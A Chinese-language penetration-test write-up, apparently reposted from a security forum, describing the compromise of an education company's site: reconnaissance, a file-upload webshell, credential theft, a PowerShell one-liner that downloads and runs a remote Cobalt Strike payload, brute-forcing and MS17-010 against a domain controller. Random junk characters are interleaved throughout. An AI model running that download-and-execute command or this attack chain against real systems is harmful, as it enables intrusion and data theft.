7 @1 H# B; r2 {+ f2 g1 m
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路, y8 h( L5 \* c5 z; |! H% c, C
1 K& S- E i1 u8 {1 N2 u
5 k3 e) q m0 o . p2 L' V- @. c. F! h6 E
l+ \8 X# n' [! O- p/ |
! w+ p* Z u4 N4 X
正文
/ i$ y0 I' ]3 @" E. ]: m & N. g- p5 q' F/ B9 j$ a* u& c
8 _% E/ K5 Y; b" P
, z5 g3 t! b/ `+ \0 {1 \ j1 \- s% e+ B7 V R
, y1 p4 V+ J) Y! s. o
目标:www.xxxx.com(一家教育机构)
" s! e% B8 A: s: H8 u6 \/ x打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
6 F5 e, K' v' v0 S" A e : u& o v. P Q1 @
% `7 v2 | U& r2 I
2 J8 C+ p% A7 E
" {1 Y$ e- ^ a2 O! j; Z7 H+ [# H' j; ^8 k9 t' }6 T) J& |
进行了简单的信息搜集
~+ _; g0 `/ k* \( o # U( h$ G: m7 n U* I- l- y
( j6 h% L; y, K. K% U
) ~. v0 }8 |( ~6 {5 _) Y3 x
& J; e# y3 H6 \5 x3 w. N
子域名搜集
, F" C7 ~" M9 L4 S% v, i5 h3 _$ m 1 E5 }5 c. j& \0 n; m0 n
/ o! v* P; {1 L' _
+ {2 H, E( a# N$ c1 L# U7 b
5 g8 L2 n3 f7 T
5 o# s" O9 h% n* @; u- H# l fofa找资产 : k( N5 a: ]6 U& D7 k/ K
9 T, F9 p1 E# A/ {
h7 ^; V' b9 z; L" {, E
2 x3 I- U7 O$ l: d) v9 ^& M# c' t- p. \) M% [+ W% W
: `2 w5 H: Q5 |, r1 S
* x2 r4 g0 {( _/ d7 s) G5 _
, G4 D* }1 L1 L2 E 一共七个资产。去重之后只有两个。
F7 P* u+ b) {3 R. ?8 | . ~% y3 |$ }6 J+ @
- z. V/ M6 {" A I, @
" A$ J, |; h% q' o$ ~5 C$ U
7 ?) k9 h( q8 R4 j# o; _ y 目录探测+ h7 f; w9 u9 n' ?7 D6 c9 _! ]
+ s& J' G0 f6 T
8 W: G% G" [. a. e$ L4 h & O) U1 w m, b- k% ?
; P( i3 u3 O7 l. E0 T) u. t0 }4 X W9 X
$ @$ o5 j) o3 N% i* u" U ~9 W' L
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
, I+ \0 X0 c0 |% ~3 w ) }! N6 e) n K
) c( @, M6 W9 U/ y2 m
0 S% O- |( x/ _$ {8 M# g6 U
* E! \ }* {: d2 M3 H& { 我又尝试了通过修改返回包来绕过登录界面
* i. U, P. v( d2 X0 P 2 _- f/ e+ D4 ?. p) X% J2 s9 k) h
! J0 N; G( D* X6 y5 F. J; t/ J3 f0 Y- w
# c( S4 h2 x) y
[8 B0 K6 d( S5 c8 Y
2 c" X$ \( u& R. z 还是不行,尝试注入无果
- i( Y0 r& |, _9 Z, i5 I
. I2 M& c, \7 Q+ d6 A/ Y8 ?( q7 |) } _" Z
% W1 j% B w5 L4 Y) @
3 Q, z+ |, L6 a7 F
9 X7 O& Q- K/ L' z 不过我目录探测出了一处Spring信息泄露
$ j3 H9 u- i8 g! Y
+ ] s1 P$ r1 `5 J% D) x' T7 u7 O3 R Z) H1 M8 s' U
) S, x2 D* V: Z& n
5 G: ]3 h- | U; { : B, y _0 b$ O$ X }1 X; j
9 M" [& ^7 @! h7 z
& c* `# ]: s& H( e( Z 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
4 \ s: V1 q Y: _ 2 q) s' D5 a- V! F
) K: H) o- o5 w; F
& g$ ?# O( w+ }' B$ h / J$ ^& v! g A% l$ n0 O
1 r& k" S8 E1 [! o6 l 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
. U, v& z. W5 s0 w$ b4 s) Y , }' s; t3 ^( M3 u8 P5 S# i
5 K, c+ ]5 b* z5 P" L$ \3 ]4 V , b. F3 r; o+ @9 I; W& }! `
, U2 H8 e/ z: |( o7 [( N
- u7 |+ e/ _7 K* | 获取有些师傅到这一步就手机抓包电脑测了。
$ N5 a8 @6 x$ b) B
2 v4 T6 P" g9 R% B5 b7 S p/ H4 c
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
0 C/ j, O! q+ q5 R) x/ ]7 B 9 ?+ m3 w. [$ x8 O2 j
- D( S( k2 Y4 m6 g- P1 l1 j 其中在一个公众号发现了小程序,可以进行注册。- v+ m" F4 P G! }" v6 i, {
" R2 C& x& m' S! ]6 a* _# \; W" G# u6 ]; ~- l; a' k5 F: S
看到了头像上传,尝试上传获取WebShell
" X7 |) O4 J9 {" K% G" L7 ` * o2 l6 b2 V# j3 H, M/ {, M9 x
& n9 n, U X, s8 f: ^
/ M! M# `1 [- D0 A( @8 y+ n
4 b- {3 \3 X( \! c& R& N& B. E v' }% q3 R" O& t
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
4 I+ G8 S4 R# ?
" w7 o/ _: P; \! Z
3 z0 }* y- U d: B
4 ?! N$ P4 s, _5 o/ F3 O 2 b, J3 C; q- u1 w. p, r$ g1 T; m
" j( N& K- A& E
然后上了大马' |( g4 y/ |+ V9 E
' R3 H/ L! I6 U! J
, {; H1 j, `) |1 S
B' T8 ^7 p' U. a
: X& T& G; Y1 n( m/ M) u3 R+ H3 Z" s- G0 b0 q7 C
- T$ S5 A) @7 Q* W ( L) r+ g& n# {" W
1 n) u4 }; Y2 l; \ F5 S 通过翻找文件发现数据库账号密码
! t" S- ^8 I W9 W2 i3 B
5 ]' T z, i4 p+ t, i/ }- q( }8 \3 M$ |' I# |7 X- e
+ G" X& ` j7 b; o& {: Q
* b G) T# F! S! A& ]
. k5 U' x7 w1 P1 ? --内网渗透
3 A, }5 u* B/ X0 w2 H, ]: z 6 T9 g" N5 @7 Z/ C7 g- b$ |- ]" r
% a8 G1 v5 j1 B 直接通过powershell执行 cs上线$ }- G- [9 [' h" A0 I
+ V4 z8 H- f- `+ F
; | v1 b; N$ M powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"& b' |. `$ b; o+ o' _+ Q6 E
- L \4 W4 ]) b: V) i3 x. y' B$ T) ^- @# E2 R `4 o
2 h: y! M& O% \6 i0 q
+ C. o4 S' h) B h j, |2 `" [2 G$ N* F( ~1 v: d" D
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破, V3 q! x' r' t2 f1 S7 T7 q" f
6 X) b1 u: t- i3 ?9 b% j% q. g3 X+ x
4 N2 ~( o; j" B, ]$ v2 @) j' j( M + L8 v& N! Z7 V; a+ L
' e1 r- h A0 I- p0 ^2 K5 n, A
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
- Q9 j. A- i3 H2 V! X# Z- e( Z
p6 s$ x- c8 f- R$ z
* K* r& C) z; w9 D) }/ H! K7 b1 D7 U) F* u% k6 m7 b( d+ A; V
6 q& f4 w9 _+ Z
! x6 w& l1 U! {% M: d( ^! e
1 J- J+ u' s }7 I$ J; y& p, ^) S" S
1 N+ ~ g3 V3 W3 k6 V' I2 A" b5 c Y( C. m
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
/ L" g4 c. ^8 d1 c 6 P7 S) S. R% e% r1 {
+ D7 B0 k( F: j8 C- s ) d; l; K/ D: n E$ g) K& A
% e" J3 I8 N" \4 z
+ E' ~3 G( E$ r* d2 A
Z# t' W0 \) k4 T4 t
# {) s1 q$ p" v N; N' j- X! U; z% q
# V7 P f& c4 }! i% Y
. {) }2 n+ y; J 4 ~# z1 f5 w) o- S8 ^8 L! v
; g# k4 q- T! z8 O+ ~6 ^
0 k) h$ K( N, C" ~- H
% {3 f/ }) _, {. [7 }6 H/ r" t" y2 J4 e6 D( X: _: i
小结
& s8 Y1 p" C3 \
% ?/ J' M$ ]/ Y/ T! e y8 w
4 M4 E: l/ \4 a5 p/ R . v. j( `7 L- p
4 r% t. I3 ^5 C8 S* r% [& L7 w7 E6 X, o& H5 c2 _
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!' I" v& @4 [# H3 p
; J2 X5 _8 Q' v/ L) N' _
: ?. F( v$ L% \8 s3 B: u3 t 8 S, b, I3 S M
* P9 v7 ]2 }' B: x8 a' L. q2 p! H2 O# H$ C1 H" S/ d7 S
- " `5 J6 A1 i" r4 N: Q
6 ~$ Q) V1 S r+ G3 L
- s& |. G) w H5 M; c/ F -
1 F7 p4 p& w& P+ H) c 6 F' m: |: F8 l% c. `, i
% q3 T" D( M: K . x" n. q7 `( h6 X
8 ?+ w. i: ?& q! N9 V
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
. @: W- M+ g# X
; T) I( ]: Q, Y4 f% Y( s* [
# k% l0 R) O* s! o/ q4 C7 A. a
6 e7 `, y! @. Y/ `( V+ y |